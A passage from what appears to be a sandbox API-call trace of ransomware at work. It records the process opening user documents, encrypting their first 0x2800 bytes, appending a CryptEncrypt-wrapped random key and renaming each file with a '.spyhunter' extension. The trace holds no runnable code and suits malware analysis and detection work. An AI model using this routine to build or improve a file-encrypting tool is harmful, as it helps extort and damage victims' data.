dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.152] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.152] WriteFile (in: hFile=0x16c, lpBuffer=0x270eff4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270efb4, lpOverlapped=0x0 | out: lpBuffer=0x270eff4*, lpNumberOfBytesWritten=0x270efb4*=0x4, lpOverlapped=0x0) returned 1 [0141.152] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270efb4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270efb4*=0x30, lpOverlapped=0x0) returned 1 [0141.152] CloseHandle (hObject=0x16c) returned 1 [0141.152] GetProcessHeap () returned 0x2c0000 [0141.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.153] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\2OxY2oo.odt.spyhunter") returned 81 [0141.153] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\2OxY2oo.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\2oxy2oo.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\2OxY2oo.odt.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\2oxy2oo.odt.spyhunter")) returned 1 [0141.154] GetProcessHeap () returned 0x2c0000 [0141.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.154] GetProcessHeap () returned 0x2c0000 [0141.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.154] GetProcessHeap () returned 0x2c0000 [0141.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81978 | out: hHeap=0x2c0000) returned 1 [0141.154] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eff0 | out: pbBuffer=0x270eff0) returned 1 [0141.154] GetProcessHeap () returned 0x2c0000 [0141.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.154] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efe8*=0x30) returned 1 [0141.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\xLnzvmXP90NrCW7Ppj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\xlnzvmxp90nrcw7ppj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\xLnzvmXP90NrCW7Ppj.pptx") returned 74 [0141.154] StrStrW (lpFirst="xLnzvmXP90NrCW7Ppj.pptx", lpSrch=".txt") returned 0x0 [0141.154] GetProcessHeap () returned 0x2c0000 [0141.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.154] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270efac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270efac*=0x1926, lpOverlapped=0x0) returned 1 [0141.155] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffe6da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.155] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1926, lpNumberOfBytesWritten=0x270efac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270efac*=0x1926, lpOverlapped=0x0) returned 1 [0141.155] GetProcessHeap () returned 0x2c0000 [0141.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.155] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.155] WriteFile (in: hFile=0x16c, lpBuffer=0x270efec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270efac, lpOverlapped=0x0 | out: lpBuffer=0x270efec*, lpNumberOfBytesWritten=0x270efac*=0x4, lpOverlapped=0x0) returned 1 [0141.156] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270efac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270efac*=0x30, lpOverlapped=0x0) returned 1 [0141.156] CloseHandle (hObject=0x16c) returned 1 [0141.156] GetProcessHeap () returned 0x2c0000 [0141.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.156] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\xLnzvmXP90NrCW7Ppj.pptx.spyhunter") returned 84 [0141.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\xLnzvmXP90NrCW7Ppj.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\xlnzvmxp90nrcw7ppj.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\xLnzvmXP90NrCW7Ppj.pptx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\xlnzvmxp90nrcw7ppj.pptx.spyhunter")) returned 1 [0141.156] GetProcessHeap () returned 0x2c0000 [0141.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.156] GetProcessHeap () returned 0x2c0000 [0141.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.156] GetProcessHeap () returned 0x2c0000 [0141.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb58f8 | out: hHeap=0x2c0000) returned 1 [0141.157] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eff0 | out: pbBuffer=0x270eff0) returned 1 [0141.157] GetProcessHeap () returned 0x2c0000 [0141.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.157] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efe8*=0x30) returned 1 [0141.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Q cvEIyn-GlL9uQ1pD3.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\q cveiyn-gll9uq1pd3.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.157] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Q cvEIyn-GlL9uQ1pD3.pptx") returned 75 [0141.157] StrStrW (lpFirst="Q cvEIyn-GlL9uQ1pD3.pptx", lpSrch=".txt") returned 0x0 [0141.157] GetProcessHeap () returned 0x2c0000 [0141.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.157] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270efac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270efac*=0x2800, lpOverlapped=0x0) returned 1 [0141.158] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.158] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270efac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270efac*=0x2800, lpOverlapped=0x0) returned 1 [0141.158] GetProcessHeap () returned 0x2c0000 [0141.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.158] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.158] WriteFile (in: hFile=0x16c, lpBuffer=0x270efec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270efac, lpOverlapped=0x0 | out: lpBuffer=0x270efec*, lpNumberOfBytesWritten=0x270efac*=0x4, lpOverlapped=0x0) returned 1 [0141.158] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270efac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270efac*=0x30, lpOverlapped=0x0) returned 1 [0141.158] CloseHandle (hObject=0x16c) returned 1 [0141.158] GetProcessHeap () returned 0x2c0000 [0141.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.159] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Q cvEIyn-GlL9uQ1pD3.pptx.spyhunter") returned 85 [0141.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Q cvEIyn-GlL9uQ1pD3.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\q cveiyn-gll9uq1pd3.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\Q cvEIyn-GlL9uQ1pD3.pptx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\q cveiyn-gll9uq1pd3.pptx.spyhunter")) returned 1 [0141.159] GetProcessHeap () returned 0x2c0000 [0141.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.159] GetProcessHeap () returned 0x2c0000 [0141.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.159] GetProcessHeap () returned 0x2c0000 [0141.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5818 | out: hHeap=0x2c0000) returned 1 [0141.160] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efe8 | out: pbBuffer=0x270efe8) returned 1 [0141.160] GetProcessHeap () returned 0x2c0000 [0141.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.160] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efe0*=0x30) returned 1 [0141.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\xhX44a-V61KGp.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\xhx44a-v61kgp.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.161] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\xhX44a-V61KGp.rtf") returned 89 [0141.161] StrStrW (lpFirst="xhX44a-V61KGp.rtf", lpSrch=".txt") returned 0x0 [0141.161] GetProcessHeap () returned 0x2c0000 [0141.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.161] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270efa4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270efa4*=0x2800, lpOverlapped=0x0) returned 1 [0141.162] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.162] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270efa4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270efa4*=0x2800, lpOverlapped=0x0) returned 1 [0141.162] GetProcessHeap () returned 0x2c0000 [0141.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.162] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.162] WriteFile (in: hFile=0x16c, lpBuffer=0x270efe4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270efa4, lpOverlapped=0x0 | out: lpBuffer=0x270efe4*, lpNumberOfBytesWritten=0x270efa4*=0x4, lpOverlapped=0x0) returned 1 [0141.162] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270efa4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270efa4*=0x30, lpOverlapped=0x0) returned 1 [0141.162] CloseHandle (hObject=0x16c) returned 1 [0141.163] GetProcessHeap () returned 0x2c0000 [0141.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.163] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\xhX44a-V61KGp.rtf.spyhunter") returned 99 [0141.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\xhX44a-V61KGp.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\xhx44a-v61kgp.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\xhX44a-V61KGp.rtf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\xhx44a-v61kgp.rtf.spyhunter")) returned 1 [0141.163] GetProcessHeap () returned 0x2c0000 [0141.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.163] GetProcessHeap () returned 0x2c0000 [0141.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.163] GetProcessHeap () returned 0x2c0000 [0141.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46528 | out: hHeap=0x2c0000) returned 1 [0141.163] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efe0 | out: pbBuffer=0x270efe0) returned 1 [0141.163] GetProcessHeap () returned 0x2c0000 [0141.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.164] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efd8*=0x30) returned 1 [0141.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\sHJCSIj0FmnEe3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\shjcsij0fmnee3.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\sHJCSIj0FmnEe3.docx") returned 91 [0141.164] StrStrW (lpFirst="sHJCSIj0FmnEe3.docx", lpSrch=".txt") returned 0x0 [0141.164] GetProcessHeap () returned 0x2c0000 [0141.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.164] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef9c*=0x1c6a, lpOverlapped=0x0) returned 1 [0141.165] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffe396, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.165] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1c6a, lpNumberOfBytesWritten=0x270ef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef9c*=0x1c6a, lpOverlapped=0x0) returned 1 [0141.165] GetProcessHeap () returned 0x2c0000 [0141.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.165] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.165] WriteFile (in: hFile=0x16c, lpBuffer=0x270efdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef9c, lpOverlapped=0x0 | out: lpBuffer=0x270efdc*, lpNumberOfBytesWritten=0x270ef9c*=0x4, lpOverlapped=0x0) returned 1 [0141.165] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef9c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef9c*=0x30, lpOverlapped=0x0) returned 1 [0141.165] CloseHandle (hObject=0x16c) returned 1 [0141.165] GetProcessHeap () returned 0x2c0000 [0141.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.165] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\sHJCSIj0FmnEe3.docx.spyhunter") returned 101 [0141.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\sHJCSIj0FmnEe3.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\shjcsij0fmnee3.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\sHJCSIj0FmnEe3.docx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\shjcsij0fmnee3.docx.spyhunter")) returned 1 [0141.166] GetProcessHeap () returned 0x2c0000 [0141.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.166] GetProcessHeap () returned 0x2c0000 [0141.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.166] GetProcessHeap () returned 0x2c0000 [0141.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46828 | out: hHeap=0x2c0000) returned 1 [0141.166] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efe0 | out: pbBuffer=0x270efe0) returned 1 [0141.166] GetProcessHeap () returned 0x2c0000 [0141.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.166] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efd8*=0x30) returned 1 [0141.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\RsKND.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\rsknd.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\RsKND.pdf") returned 81 [0141.167] StrStrW (lpFirst="RsKND.pdf", lpSrch=".txt") returned 0x0 [0141.167] GetProcessHeap () returned 0x2c0000 [0141.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.167] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef9c*=0x2800, lpOverlapped=0x0) returned 1 [0141.167] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.168] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef9c*=0x2800, lpOverlapped=0x0) returned 1 [0141.168] GetProcessHeap () returned 0x2c0000 [0141.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.168] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.168] WriteFile (in: hFile=0x16c, lpBuffer=0x270efdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef9c, lpOverlapped=0x0 | out: lpBuffer=0x270efdc*, lpNumberOfBytesWritten=0x270ef9c*=0x4, lpOverlapped=0x0) returned 1 [0141.168] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef9c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef9c*=0x30, lpOverlapped=0x0) returned 1 [0141.168] CloseHandle (hObject=0x16c) returned 1 [0141.168] GetProcessHeap () returned 0x2c0000 [0141.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0141.168] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\RsKND.pdf.spyhunter") returned 91 [0141.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\RsKND.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\rsknd.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\RsKND.pdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\rsknd.pdf.spyhunter")) returned 1 [0141.169] GetProcessHeap () returned 0x2c0000 [0141.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0141.169] GetProcessHeap () returned 0x2c0000 [0141.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.169] GetProcessHeap () returned 0x2c0000 [0141.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64128 | out: hHeap=0x2c0000) returned 1 [0141.169] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efd8 | out: pbBuffer=0x270efd8) returned 1 [0141.169] GetProcessHeap () returned 0x2c0000 [0141.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.169] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efd0*=0x30) returned 1 [0141.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\pTWJhKHYm8ibMuP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\pdxdugtytli-knfbqequ\\ptwjhkhym8ibmup.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.169] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\pdXDUGtytLi-kNfBqEQu\\pTWJhKHYm8ibMuP.doc") returned 91 [0141.169] StrStrW (lpFirst="pTWJhKHYm8ibMuP.doc", lpSrch=".txt") returned 0x0 [0141.169] GetProcessHeap () returned 0x2c0000 [0141.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.170] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef94*=0x2800, lpOverlapped=0x0) returned 1 [0141.170] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, 